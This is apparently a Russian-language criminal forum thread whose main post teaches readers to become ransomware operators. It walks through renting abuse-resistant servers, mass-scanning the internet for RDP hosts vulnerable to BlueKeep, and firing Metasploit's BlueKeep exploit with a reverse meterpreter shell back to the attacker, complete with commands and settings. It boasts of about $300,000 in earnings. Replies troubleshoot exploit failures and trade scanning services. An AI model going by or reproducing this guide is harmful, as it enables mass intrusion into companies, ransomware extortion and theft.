• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Добываем доступы в корпы через паблик RCE

Как заработать от 1к до 100к баксов за месяц почти без вложений?

Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту

Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)

Обновим пакеты
sudo apt-get update

Накатим xrdp для работы через терминальные сессии

sudo apt-get install xrdp

Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)

sudo apt-get install xfce4 xfce4-terminal

Разрешим xrdp исользовать эту оболчку

sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh

Включаем xrpd

Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)


sudo systemctl enable xrdp


Done теперь вы можете работать с сервером через терминальную сессию


поставим удобный текстовый редактор gedit

sudo apt-get install gedit


Поставим htop для мониторинга загруженности системы

sudo apt-get install htop


Установка metasploit, БД к нему подтягивать не будем она не понадобиться


качаем метасплойт курлом или wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

даем права chmod 755 msfinstall

sudo ./msfinstall


Теперь при наборе msfconsole в шелле метасплойт запуститься.

II выбор RCE и подготовка материала

Добывать свой хлеб мы будем данной уязвимостью

xttps://en.wikipedia.org/wiki/BlueKeep

в метасплойте есть rce для него

exploit/windows/rdp/cve_2019_0708_bluekeep_rce


Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)

С RCE мы определились

теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип

В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп

лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп

Я покажу на примере стандандартного 3389 порта


Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep

ставим все не обходимое для работы масскана sudo apt-get install git gcc make libpcap-dev
затягиваем сорсы к себе git clone https://github.com/robertdavidgraham/masscan
переходим в каталог с массканом cd masscan
собираем в многопотоке make -j

Качаем бесплатно либо покупаем депы IP адресов


masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть

awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt

выдаст чистые результаты IP с output фаила масскана


Ставим сканер на уязвимость блюкип и все необходимо для его работы

sudo apt-get install libssl-dev sudo apt-get install build-essential

git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
компилируем make -j

Запуск сканера

./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt

--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )

--port 3389 порт который сканируем

--file /root/rdpscan/ch2.txt путь до фаила с ипами

grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt

III получаем доступы

Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер


и так запускаем метасплойт

msfconsole


И сразу открываем второе окно терминала и там опять запускаем метасплойт


В первом окне делаем handler (туда будут лететь сессии отдельным окном)

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp_rc4 (выбираем пелоад реверс (когда цель подключаеться к нам) с шифрованием )
set EXITFUNC thread
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.

set LHOST хост нашей впс
set LPORT порт где будет висит слушатель
set RC4PASSWORD PASSS ( пароль для RC4)
set ExitOnSession 0 (данный параметр будет держать сессию всегда онлайн (тоесть не будет слипа может привести к быстрому спаливанию))
setg SessionLogging y включить логирование
setg loglevel 1 уровень логирования
run -j запуск

хэндлер готов и ожидает коннектов

переходим во второе окно
Bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp_rc4
set EXITFUNC thread
set DisablePayloadHandler 1 (обязтаельно 1 что бы сесия летела в отдельное окно)
set LHOST ип впс
set LPORT порт (указывать такой же как и в хэндлере)
set RC4PASSWORD PASSS (пароль такой же как в хэндлере)
set ConnectTimeout 5 (таймаут)
set GROOMSIZE 100 (количество мегабайт которыми будет заспамливаться хост играйтесь с парметрами от 100 до 250 ) всегда будут прилетать разные машины
set GROOMCHANNELCOUNT 1
set forceexploit 1 исполнять принудетельно
set target 1 (дефолтный таргет тут менять ничего не нужно )
set rhosts file:/root/rdpscan/4.txt (путь до фаила с уязмимыми машинами)
set RPORT (если вы используете не старндартый порт для RDP если 3389 то его можно не указывать он стоит по дефолту)
run - запуск

через какое то время в хендлер полетят сесии


Computer : V-RDS-01 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_GB Domain : BROWNHILLS Logged On Users : 41 Meterpreter : x64/windows

Вам остается только закрепляться и отбирать доступы)

Enjoy

c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы
Сними видео-урок как Форб, сразу все от тебя отстанут ))
А ещё лучше два, с постэксплуатацией.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
В свое время чел который мне дал наводку по пентесту сетей (огромное ему щас спасибо раньше обижался на него) сказал я тебя учить ничему не буду иди нахуй учись сам все есть в гугле, потом спасибо скажешь!
 
Метасплоит выдает ошибки про сертификаты и обрывается
Код:
[+] IP-ADDRESS:3389  - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] IP-ADDRESS:3389  - Scanned 1 of 1 hosts (100% complete)
[*] IP-ADDRESS:3389 - Verifying RDP protocol...
[*] IP-ADDRESS:3389 - Attempting to connect using TLS security
[*] IP-ADDRESS:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] IP-ADDRESS:3389 - Attempting to connect using Standard RDP security
[*] IP-ADDRESS:3389 - Sending erect domain request
[*] IP-ADDRESS:3389 - Sending security exchange PDU
[*] IP-ADDRESS:3389 - Sending client info PDU
[*] IP-ADDRESS:3389 - Received License packet (34 bytes)
[*] IP-ADDRESS:3389 - Got license packet type 0xff (LICENSE_ERROR_ALERT)
[*] IP-ADDRESS:3389 - License error/alert code 0x7 (LICENSE_ISSUED)
[*] IP-ADDRESS:3389 - Waiting for Server Demand packet
[*] IP-ADDRESS:3389 - Received Server Demand packet
[*] IP-ADDRESS:3389 - Sending client confirm active PDU
[*] IP-ADDRESS:3389 - Sending client synchronize PDU
[*] IP-ADDRESS:3389 - Sending client control cooperate PDU
[*] IP-ADDRESS:3389 - Sending client control request control PDU
[*] IP-ADDRESS:3389 - Sending client input sychronize PDU
[*] IP-ADDRESS:3389 - Sending client font list PDU
[-] IP-ADDRESS:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError

Все что в гугле перепробовал. С коннектом проблем нет.
 
Метасплоит выдает ошибки про сертификаты и обрывается
Код:
[+] IP-ADDRESS:3389  - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] IP-ADDRESS:3389  - Scanned 1 of 1 hosts (100% complete)
[*] IP-ADDRESS:3389 - Verifying RDP protocol...
[*] IP-ADDRESS:3389 - Attempting to connect using TLS security
[*] IP-ADDRESS:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] IP-ADDRESS:3389 - Attempting to connect using Standard RDP security
[*] IP-ADDRESS:3389 - Sending erect domain request
[*] IP-ADDRESS:3389 - Sending security exchange PDU
[*] IP-ADDRESS:3389 - Sending client info PDU
[*] IP-ADDRESS:3389 - Received License packet (34 bytes)
[*] IP-ADDRESS:3389 - Got license packet type 0xff (LICENSE_ERROR_ALERT)
[*] IP-ADDRESS:3389 - License error/alert code 0x7 (LICENSE_ISSUED)
[*] IP-ADDRESS:3389 - Waiting for Server Demand packet
[*] IP-ADDRESS:3389 - Received Server Demand packet
[*] IP-ADDRESS:3389 - Sending client confirm active PDU
[*] IP-ADDRESS:3389 - Sending client synchronize PDU
[*] IP-ADDRESS:3389 - Sending client control cooperate PDU
[*] IP-ADDRESS:3389 - Sending client control request control PDU
[*] IP-ADDRESS:3389 - Sending client input sychronize PDU
[*] IP-ADDRESS:3389 - Sending client font list PDU
[-] IP-ADDRESS:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError

Все что в гугле перепробовал. С коннектом проблем нет.
ну откровенно говоря, в вашем логе не говорят, почему сплоит не сработал..
если очч инересно разобраться в работе Bitmap Cache protocol data unit (PDU), то вот линк...
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ну откровенно говоря, в вашем логе не говорят, почему сплоит не сработал..
если очч инересно разобраться в работе Bitmap Cache protocol data unit (PDU), то вот линк...
сколько таргетов проверил?
 
сколько таргетов проверил?
не понял, к чему ваш вопрос.. но что касается bluekeep, то в районе 5к уязвимых по чеку мсф, а так с force 1 - хз..

зы но я до вашего материала тестировал эту уязву..
 
Эта статья не руководство к действию пошаговая, а пища для размышлений и немного опыта автора. Лучше после прочтения, посмотрите курсы по MSF и разберитесь как он работает, там помимо этого еще хватает интересных фич. Паблик,но для наработки опыта вполне сойдет.
 
Могу за 10 бакинских рублей спарсить с shodan IP с любым портом и "дыркой" в скрипте с указанными "приметами" с выбом по странам и все в общую кучу.
Бро, поделись в пм, где можно премиум шодан откопать?
 
Shodan не даст нормального результата.Предстваляете сколько народу там сидит чекает?)Неговоря уже о API.Пишите запросы,скину в тему бесплатно json
P.S. Потом начнется нытье как распарсить json)
 
ну откровенно говоря, в вашем логе не говорят, почему сплоит не сработал..
если очч инересно разобраться в работе Bitmap Cache protocol data unit (PDU), то вот линк...
самый детальный лог этот. больше не нашел
 
Ухх как палитесь схем-хантеры из тг. Психилогическая цифра так желаемая легким CASE' ом должна быть в кармане за пару дней просто так и тянет поболтать. Начать с того чтобы не читать схемы - хорошее начало. А еще остерегайтесь своих желаний
 
Последнее редактирование:
А вот подобные схемы, разве они не заюзанные в доль и поперёк до тебя? А то профит от подобных схем вызывает сомнение, ИМХО
Нет. Даже Pulse всё еще выдает хорошие доступы.
 
Нет. Даже Pulse всё еще выдает хорошие доступы.
От блин. А я сколько себе отказывал и не пробовал подобное будучи уверемнным в том, что тему сливают после её смерти ?
 
through the torus can not be massed?
I am using a kali linux virtual machine which streams the internet through whonix. Port scanning does not work with this. However, I believe it can be used to use rdpscan to detect bluekeep vulnerability after you get your rdp massscan IP addresses.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх